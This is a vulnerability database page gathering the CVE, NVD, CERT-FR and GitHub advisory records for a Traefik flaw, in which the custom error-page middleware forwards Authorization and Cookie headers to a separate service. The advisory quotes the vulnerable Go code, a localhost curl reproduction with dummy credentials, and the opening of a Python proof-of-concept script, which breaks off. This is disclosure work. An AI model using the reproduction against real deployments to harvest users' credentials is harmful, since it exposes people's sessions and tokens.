Vulnerability-Lookup

CVE-2026-41181 (GCVE-0-2026-41181)

Vulnerability from cvelistv5 – Published: 2026-05-15 16:27 – Updated: 2026-05-16 01:11

Title

Traefik: Errors middleware forwards Authorization and Cookie headers to separate error page service

Summary

Traefik is an HTTP reverse proxy and load balancer. Prior to 2.11.44, 3.6.15, and 3.7.0-rc.3, there is an information disclosure vulnerability in Traefik's errors (custom error pages) middleware. When the backend returns a response matching the configured status range, the middleware forwards the original request's complete header set, including Authorization, Cookie, and other authentication material, to the separate error page service rather than only the minimal context needed to render the error page. This behavior is undocumented: the documentation states only that Host is forwarded by default, so operators are not warned that sensitive credentials are shared across service boundaries. Deployments using the errors middleware with a distinct error page service may inadvertently expose end-user credentials to infrastructure that was not intended to receive them. This vulnerability is fixed in 2.11.44, 3.6.15, and 3.7.0-rc.3.

Severity ?

6.9 (Medium)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N

CWE

CWE-201 - Insertion of Sensitive Information Into Sent Data

Assigner

GitHub_M

References

4 references

URL	Tags
https://github.com/traefik/traefik/security/advis…	x_refsource_CONFIRM
https://github.com/traefik/traefik/releases/tag/v…	x_refsource_MISC
https://github.com/traefik/traefik/releases/tag/v3.6.15	x_refsource_MISC
https://github.com/traefik/traefik/releases/tag/v…	x_refsource_MISC

Impacted products

1 product

Vendor	Product	Version
traefik	traefik	Affected: >= 3.7.0-rc.0, < 3.7.0-rc.3 Affected: >= 3.0.0-beta1, < 3.6.14 Affected: < 2.11.43

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-41181",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-16T01:10:51.338125Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-16T01:11:03.867Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "traefik",
          "vendor": "traefik",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 3.7.0-rc.0, \u003c 3.7.0-rc.3"
            },
            {
              "status": "affected",
              "version": "\u003e= 3.0.0-beta1, \u003c 3.6.14"
            },
            {
              "status": "affected",
              "version": "\u003c 2.11.43"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Traefik is an HTTP reverse proxy and load balancer. Prior to 2.11.44, 3.6.15, and 3.7.0-rc.3, there is an information disclosure vulnerability in Traefik\u0027s errors (custom error pages) middleware. When the backend returns a response matching the configured status range, the middleware forwards the original request\u0027s complete header set, including Authorization, Cookie, and other authentication material, to the separate error page service rather than only the minimal context needed to render the error page. This behavior is undocumented: the documentation states only that Host is forwarded by default, so operators are not warned that sensitive credentials are shared across service boundaries. Deployments using the errors middleware with a distinct error page service may inadvertently expose end-user credentials to infrastructure that was not intended to receive them. This vulnerability is fixed in 2.11.44, 3.6.15, and 3.7.0-rc.3."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 6.9,
            "baseSeverity": "MEDIUM",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "LOW",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "NONE"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-201",
              "description": "CWE-201: Insertion of Sensitive Information Into Sent Data",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-15T16:27:14.823Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/traefik/traefik/security/advisories/GHSA-p6hg-qh38-555r",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/traefik/traefik/security/advisories/GHSA-p6hg-qh38-555r"
        },
        {
          "name": "https://github.com/traefik/traefik/releases/tag/v2.11.44",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/traefik/traefik/releases/tag/v2.11.44"
        },
        {
          "name": "https://github.com/traefik/traefik/releases/tag/v3.6.15",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/traefik/traefik/releases/tag/v3.6.15"
        },
        {
          "name": "https://github.com/traefik/traefik/releases/tag/v3.7.0-rc.3",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/traefik/traefik/releases/tag/v3.7.0-rc.3"
        }
      ],
      "source": {
        "advisory": "GHSA-p6hg-qh38-555r",
        "discovery": "UNKNOWN"
      },
      "title": "Traefik: Errors middleware forwards Authorization and Cookie headers to separate error page service"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-41181",
    "datePublished": "2026-05-15T16:27:14.823Z",
    "dateReserved": "2026-04-17T16:34:45.526Z",
    "dateUpdated": "2026-05-16T01:11:03.867Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-41181",
      "date": "2026-05-23",
      "epss": "0.00029",
      "percentile": "0.08556"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-41181\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-15T17:16:46.320\",\"lastModified\":\"2026-05-19T12:24:19.873\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Traefik is an HTTP reverse proxy and load balancer. Prior to 2.11.44, 3.6.15, and 3.7.0-rc.3, there is an information disclosure vulnerability in Traefik\u0027s errors (custom error pages) middleware. When the backend returns a response matching the configured status range, the middleware forwards the original request\u0027s complete header set, including Authorization, Cookie, and other authentication material, to the separate error page service rather than only the minimal context needed to render the error page. This behavior is undocumented: the documentation states only that Host is forwarded by default, so operators are not warned that sensitive credentials are shared across service boundaries. Deployments using the errors middleware with a distinct error page service may inadvertently expose end-user credentials to infrastructure that was not intended to receive them. This vulnerability is fixed in 2.11.44, 3.6.15, and 3.7.0-rc.3.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":6.9,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"NONE\",\"vulnIntegrityImpact\":\"NONE\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"LOW\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N\",\"baseScore\":5.8,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":1.4}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-201\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2.11.44\",\"matchCriteriaId\":\"6653A7E1-C552-4A89-9953-82DB3D99098D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"3.0.0\",\"versionEndExcluding\":\"3.6.15\",\"matchCriteriaId\":\"AB8757F8-7365-42CC-98FF-D15E3943831C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:traefik:traefik:3.7.0:ea1:*:*:*:*:*:*\",\"matchCriteriaId\":\"7881B288-5141-4508-AB71-3F7586168437\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:traefik:traefik:3.7.0:ea2:*:*:*:*:*:*\",\"matchCriteriaId\":\"AE5788A2-CCF9-4E87-8B94-133874F99CAE\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:traefik:traefik:3.7.0:ea3:*:*:*:*:*:*\",\"matchCriteriaId\":\"B133B8F6-1C34-4354-9C1C-A5E063D27BC6\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:traefik:traefik:3.7.0:rc1:*:*:*:*:*:*\",\"matchCriteriaId\":\"976D40ED-187E-4C95-BB5A-126F06B8FAD9\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:traefik:traefik:3.7.0:rc2:*:*:*:*:*:*\",\"matchCriteriaId\":\"61AC89E1-321F-495D-A246-3CC16413EE1B\"}]}]}],\"references\":[{\"url\":\"https://github.com/traefik/traefik/releases/tag/v2.11.44\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\",\"Release Notes\"]},{\"url\":\"https://github.com/traefik/traefik/releases/tag/v3.6.15\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\",\"Release Notes\"]},{\"url\":\"https://github.com/traefik/traefik/releases/tag/v3.7.0-rc.3\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\",\"Release Notes\"]},{\"url\":\"https://github.com/traefik/traefik/security/advisories/GHSA-p6hg-qh38-555r\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Patch\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-41181\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-16T01:10:51.338125Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-16T01:10:58.678Z\"}}], \"cna\": {\"title\": \"Traefik: Errors middleware forwards Authorization and Cookie headers to separate error page service\", \"source\": {\"advisory\": \"GHSA-p6hg-qh38-555r\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 6.9, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"NONE\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"LOW\", \"vulnConfidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"traefik\", \"product\": \"traefik\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 3.7.0-rc.0, \u003c 3.7.0-rc.3\"}, {\"status\": \"affected\", \"version\": \"\u003e= 3.0.0-beta1, \u003c 3.6.14\"}, {\"status\": \"affected\", \"version\": \"\u003c 2.11.43\"}]}], \"references\": [{\"url\": \"https://github.com/traefik/traefik/security/advisories/GHSA-p6hg-qh38-555r\", \"name\": \"https://github.com/traefik/traefik/security/advisories/GHSA-p6hg-qh38-555r\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/traefik/traefik/releases/tag/v2.11.44\", \"name\": \"https://github.com/traefik/traefik/releases/tag/v2.11.44\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/traefik/traefik/releases/tag/v3.6.15\", \"name\": \"https://github.com/traefik/traefik/releases/tag/v3.6.15\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/traefik/traefik/releases/tag/v3.7.0-rc.3\", \"name\": \"https://github.com/traefik/traefik/releases/tag/v3.7.0-rc.3\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Traefik is an HTTP reverse proxy and load balancer. Prior to 2.11.44, 3.6.15, and 3.7.0-rc.3, there is an information disclosure vulnerability in Traefik\u0027s errors (custom error pages) middleware. When the backend returns a response matching the configured status range, the middleware forwards the original request\u0027s complete header set, including Authorization, Cookie, and other authentication material, to the separate error page service rather than only the minimal context needed to render the error page. This behavior is undocumented: the documentation states only that Host is forwarded by default, so operators are not warned that sensitive credentials are shared across service boundaries. Deployments using the errors middleware with a distinct error page service may inadvertently expose end-user credentials to infrastructure that was not intended to receive them. This vulnerability is fixed in 2.11.44, 3.6.15, and 3.7.0-rc.3.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-201\", \"description\": \"CWE-201: Insertion of Sensitive Information Into Sent Data\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-15T16:27:14.823Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-41181\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-16T01:11:03.867Z\", \"dateReserved\": \"2026-04-17T16:34:45.526Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-15T16:27:14.823Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

CERTFR-2026-AVI-0531

Vulnerability from certfr_avis - Published: 2026-05-05 - Updated: 2026-05-05

Une vulnérabilité a été découverte dans Traefik. Elle permet à un attaquant de provoquer une atteinte à la confidentialité des données.

Solutions

Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

Impacted products

Vendor	Product	Description
Traefik	Traefik	Traefik versions v2.11.x antérieures à v2.11.44
Traefik	Traefik	Traefik versions v3.6.x antérieures à v3.6.15
Traefik	Traefik	Traefik versions v3.7.0-rc.x antérieures à v3.7.0-rc.3

References

Title

Publication Time

FKIE_CVE-2026-41181

Vulnerability from fkie_nvd - Published: 2026-05-15 17:16 - Updated: 2026-05-19 12:24

Severity ?

5.8 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/traefik/traefik/releases/tag/v2.11.44	Product, Release Notes
security-advisories@github.com	https://github.com/traefik/traefik/releases/tag/v3.6.15	Product, Release Notes
security-advisories@github.com	https://github.com/traefik/traefik/releases/tag/v3.7.0-rc.3	Product, Release Notes
security-advisories@github.com	https://github.com/traefik/traefik/security/advisories/GHSA-p6hg-qh38-555r	Exploit, Mitigation, Patch, Vendor Advisory

Impacted products

Vendor	Product	Version
traefik	traefik	*
traefik	traefik	*
traefik	traefik	3.7.0
traefik	traefik	3.7.0
traefik	traefik	3.7.0
traefik	traefik	3.7.0
traefik	traefik	3.7.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "6653A7E1-C552-4A89-9953-82DB3D99098D",
              "versionEndExcluding": "2.11.44",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "AB8757F8-7365-42CC-98FF-D15E3943831C",
              "versionEndExcluding": "3.6.15",
              "versionStartIncluding": "3.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:traefik:traefik:3.7.0:ea1:*:*:*:*:*:*",
              "matchCriteriaId": "7881B288-5141-4508-AB71-3F7586168437",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:traefik:traefik:3.7.0:ea2:*:*:*:*:*:*",
              "matchCriteriaId": "AE5788A2-CCF9-4E87-8B94-133874F99CAE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:traefik:traefik:3.7.0:ea3:*:*:*:*:*:*",
              "matchCriteriaId": "B133B8F6-1C34-4354-9C1C-A5E063D27BC6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:traefik:traefik:3.7.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "976D40ED-187E-4C95-BB5A-126F06B8FAD9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:traefik:traefik:3.7.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "61AC89E1-321F-495D-A246-3CC16413EE1B",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Traefik is an HTTP reverse proxy and load balancer. Prior to 2.11.44, 3.6.15, and 3.7.0-rc.3, there is an information disclosure vulnerability in Traefik\u0027s errors (custom error pages) middleware. When the backend returns a response matching the configured status range, the middleware forwards the original request\u0027s complete header set, including Authorization, Cookie, and other authentication material, to the separate error page service rather than only the minimal context needed to render the error page. This behavior is undocumented: the documentation states only that Host is forwarded by default, so operators are not warned that sensitive credentials are shared across service boundaries. Deployments using the errors middleware with a distinct error page service may inadvertently expose end-user credentials to infrastructure that was not intended to receive them. This vulnerability is fixed in 2.11.44, 3.6.15, and 3.7.0-rc.3."
    }
  ],
  "id": "CVE-2026-41181",
  "lastModified": "2026-05-19T12:24:19.873",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 5.8,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 1.4,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ],
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 6.9,
          "baseSeverity": "MEDIUM",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "NONE",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "LOW",
          "subIntegrityImpact": "NONE",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "NONE",
          "vulnConfidentialityImpact": "NONE",
          "vulnIntegrityImpact": "NONE",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-05-15T17:16:46.320",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Product",
        "Release Notes"
      ],
      "url": "https://github.com/traefik/traefik/releases/tag/v2.11.44"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Product",
        "Release Notes"
      ],
      "url": "https://github.com/traefik/traefik/releases/tag/v3.6.15"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Product",
        "Release Notes"
      ],
      "url": "https://github.com/traefik/traefik/releases/tag/v3.7.0-rc.3"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Mitigation",
        "Patch",
        "Vendor Advisory"
      ],
      "url": "https://github.com/traefik/traefik/security/advisories/GHSA-p6hg-qh38-555r"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-201"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-P6HG-QH38-555R

Vulnerability from github – Published: 2026-05-04 19:26 – Updated: 2026-05-15 23:48

Summary

Traefik's errors middleware forwards Authorization and Cookie headers to separate error page service

Details

Summary

There is a medium severity information disclosure vulnerability in Traefik's errors (custom error pages) middleware. When the backend returns a response matching the configured status range, the middleware forwards the original request's complete header set, including Authorization, Cookie, and other authentication material, to the separate error page service rather than only the minimal context needed to render the error page. This behavior is undocumented: the documentation states only that Host is forwarded by default, so operators are not warned that sensitive credentials are shared across service boundaries. Deployments using the errors middleware with a distinct error page service may inadvertently expose end-user credentials to infrastructure that was not intended to receive them.

Patches

https://github.com/traefik/traefik/releases/tag/v2.11.44
https://github.com/traefik/traefik/releases/tag/v3.6.15
https://github.com/traefik/traefik/releases/tag/v3.7.0-rc.3

For more information

If there are any questions or comments about this advisory, please open an issue.

Original Description ## Description Traefik v3.6.13's supported HTTP `errors` middleware discloses sensitive request headers to the configured error page service when the original backend response matches the configured status range and the middleware takes its default header-forwarding path. In the reproduced configuration, the business router `audit-customerrors@docker` pointed to backend service `audit-backend`, attached middleware `audit-leak@docker`, and the middleware was configured with `errors.status=500-599`, `errors.service=audit-error`, and `errors.query=/collect`. A request to the business route caused the backend to return `500`, after which Traefik created a secondary request to the error service and copied the original `Authorization` and `Cookie` headers into that cross-service request. This is a normal feature path on an ordinary HTTP route. It does not depend on `api.insecure`, the dashboard, pprof, or a debug-only mode. The confidentiality boundary that breaks here is the service boundary between the original backend chain and the separate error page service: credentials that were only meant for the original backend are automatically delivered to another service. The root cause is in `pkg/middlewares/customerrors/custom_errors.go:151-160`:

if len(c.forwardNginxHeaders) > 0 {
    utils.CopyHeaders(pageReq.Header, c.forwardNginxHeaders)
    pageReq.Header.Set("X-Code", strconv.Itoa(code))
    pageReq.Header.Set("X-Format", req.Header.Get("Accept"))
    pageReq.Header.Set("X-Original-Uri", req.URL.RequestURI())
} else {
    utils.CopyHeaders(pageReq.Header, req.Header)
}

Unless the `NginxHeaders` branch is explicitly used, the middleware copies the entire original request header map into the error page request. The documentation at `docs/content/reference/routing-configuration/http/middlewares/errorpages.md:103-107` only states that `Host` is forwarded by default, so operators are not warned that `Authorization`, `Cookie`, and other authentication material are forwarded as well. ## Steps To Reproduce 1. Deploy Traefik v3.6.13 with a normal business route that uses the supported `errors` middleware and points `errors.service` to a distinct service. The attached PoC uses `BASE_URL = "http://127.0.0.1:28080"`, `API_BASE_URL = "http://127.0.0.1:28180"`, `ROUTER_PATH = "/audit-customerrors"`, `AUTHORIZATION = "Bearer audit-secret-token"`, and `COOKIE = "sessionid=audit-cookie; theme=dark"`. 2. Start the two attached helper services `customerrors_backend.py` and `customerrors_error.py`. The backend listens on port `8000` and always returns `500`. The error service listens on port `8000` and returns the request method, path, and received headers as JSON. The PoC starts them with the router and middleware labels below so that the business request is handled by the backend, while the error page is fetched from the separate error service:

traefik.http.routers.audit-customerrors.rule=PathPrefix(`/audit-customerrors`)
traefik.http.routers.audit-customerrors.entrypoints=web
traefik.http.routers.audit-customerrors.priority=100
traefik.http.routers.audit-customerrors.service=audit-backend
traefik.http.routers.audit-customerrors.middlewares=audit-leak
traefik.http.services.audit-backend.loadbalancer.server.port=8000
traefik.http.middlewares.audit-leak.errors.status=500-599
traefik.http.middlewares.audit-leak.errors.service=audit-error
traefik.http.middlewares.audit-leak.errors.query=/collect

3. Confirm that Traefik has loaded the route and middleware. The attached `customerrors_router.json` shows that `audit-customerrors@docker` uses middleware `audit-leak@docker`, and the attached `customerrors_middleware.json` shows that the middleware is enabled with `status` `500-599`, `service` `audit-error`, and `query` `/collect`. 4. Send a request containing sensitive credentials through the business route. The manual reproduction used the following request, and the automated PoC sends the same header values:

curl -i \
  -H 'Authorization: Bearer audit-secret-token' \
  -H 'Cookie: sessionid=audit-cookie; theme=dark' \
  http://127.0.0.1:28080/audit-customerrors

5. Observe that the backend returns `500`, Traefik internally requests `/collect` from the error service, and the error service receives the original `Authorization` and `Cookie` headers. The attached `manual_curl_customerrors.txt` response shows the leaked headers directly, and the attached `poc_customerrors_header_leak.output.txt` execution log shows the same result from the automated PoC. ## Recommendations The default behavior should forward only the minimal context needed to render an error page instead of copying the full original header set with `utils.CopyHeaders(pageReq.Header, req.Header)`. At minimum, Traefik should strip `Authorization`, `Proxy-Authorization`, `Cookie`, `Set-Cookie`, and common custom authentication headers such as `X-Api-Key` before issuing the error page request. If operators truly need additional headers, that behavior should be opt-in through an explicit allowlist rather than the default. The documentation should also describe the current behavior and warn that routing an error page to a separate service can otherwise disclose end-user credentials across service boundaries. ## PoC The main PoC attachment is `poc_customerrors_header_leak.py`.

import json
import os
import subprocess
import sys
import time
import urllib.error
import urllib.request
from pathlib import Path


TARGET = "traefik customErrors sensitive header leak"
BASE_URL = "http://127.0.0.1:28080"
API_BASE_URL = "http://127.0.0.1:28180"
TRAEFIK_CONTAINER = "traefik-openclaw"
NETWORK = ""
DOCKER_IMAGE = "python:3.12-alpine"
BACKEND_CONTAINER = "traefik-audit-backend"
ERROR_CONTAINER = "traefik-audit-error"
ROUTER_NAME = "audit-customerrors"
ROUTER_PATH = "/audit-customerrors"
AUTHORIZATION = "Bearer audit-secret-token"
COOKIE = "sessionid=audit-cookie; theme=dark"
TIMEOUT_SECONDS = 10
ROUTER_WAIT_SECONDS = 20

EVIDENCE_DIR = Path(__file__).resolve().parent
BACKEND_SCRIPT = EVIDENCE_DIR / "customerrors_backend.py"
ERROR_SCRIPT = EVIDENCE_DIR / "customerrors_error.py"


def run_command(command):
    print(f"$ {' '.join(command)}")
    completed = subprocess.run(command, capture_output=True, text=True, check=True)
